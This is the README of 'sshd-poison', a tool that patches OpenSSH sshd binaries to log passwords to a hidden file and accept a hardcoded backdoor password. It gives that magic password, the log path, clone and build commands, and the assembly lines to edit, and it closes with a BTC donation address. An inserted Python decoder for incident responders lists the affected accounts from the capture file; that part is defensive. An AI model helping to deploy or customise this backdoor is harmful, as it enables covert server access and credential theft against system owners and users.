sshd-poison is a tool that modifies an sshd binary to capture password-based authentications and allows you to log in to some accounts using a magic-pass.
This only works with x86_64 ELF files. It should work with OpenSSH 7.7p1 up to 8.3p1. The code needs some modifications to work with older versions.
OpenSSH versions tested:
- OpenSSH_7.9p1 Debian-10+deb10u2, OpenSSL 1.1.1d 10 Sep 2019
- OpenSSH_8.3p1, OpenSSL 1.1.1g 21 Apr 2020
Unfortunately, the power of this magic is a bit limited. If you try to log in as root and root login is not allowed, or if the user isn't valid, it won't work.
The magic-pass is `anneeeeeeeeeeee`.
Captured passwords are stored in `/tmp/.nothing`.
The strings are saved in reverse order in the following format: `\0password\0user\0ip`, or rather `\0drowssap\0resu\0pi`.
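For incident responders who find such a file on a host: the following is an added example, not part of sshd-poison, that decodes the layout described above to list affected accounts and source IPs without echoing the passwords. The function names and the sample bytes are constructed for illustration, and the exact record layout is assumed from the description above.

```python
"""Triage decoder for the capture-file layout described above (added example)."""
from collections import defaultdict


def parse_capture(blob: bytes):
    """Return a list of (user, ip, password_length) tuples.

    Assumed layout, taken from the README text: each record is
    NUL + reversed(password) + NUL + reversed(user) + NUL + reversed(ip).
    """
    if not blob:
        return []
    fields = blob.split(b"\0")
    # The data starts with a NUL, so the first split element is empty.
    if fields[0] == b"":
        fields = fields[1:]
    records = []
    # Group positionally instead of filtering empty fields, so an empty
    # password does not shift the alignment of later records. A trailing
    # incomplete record (file truncated mid-write) is ignored.
    for i in range(0, len(fields) - len(fields) % 3, 3):
        pw, user, ip = (f[::-1] for f in fields[i:i + 3])
        records.append((user.decode("utf-8", "replace"),
                        ip.decode("ascii", "replace"),
                        len(pw)))  # keep only the length, never the secret
    return records


def exposed_accounts(records):
    """Map each user to the sorted source IPs seen, for credential rotation."""
    seen = defaultdict(set)
    for user, ip, _ in records:
        seen[user].add(ip)
    return {user: sorted(ips) for user, ips in seen.items()}


# Constructed sample data (documentation IP ranges), second record has an
# empty password to exercise the alignment handling.
SAMPLE = (b"\0" + b"hunter2"[::-1] + b"\0" + b"alice"[::-1] + b"\0" + b"192.0.2.10"[::-1]
          + b"\0" + b"" + b"\0" + b"bob"[::-1] + b"\0" + b"198.51.100.7"[::-1])

if __name__ == "__main__":
    for user, ips in exposed_accounts(parse_capture(SAMPLE)).items():
        print(user, ips)
```

Every account listed should be treated as having a disclosed password, and the sshd binary on that host should be compared against the distribution package's checksum.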
```
$ git clone --recurse-submodules https://github.com/hc0d3r/sshd-poison
$ cd sshd-poison
$ make
```
If you want a different magic-pass/logfile, edit the following lines in sc.asm:
```
magic_pass: db 'anneeeeeeeeeeee', 0x0
logfile: db '/tmp/.nothing', 0x0
```
Use for illegal purposes is not allowed.
You can help with code, or by donating money. If you wanna help with code, use the kernel code style as a reference.
BTC: 19p3bnJ1t7DByfD8LdgU6WRSnUc2ftBxkP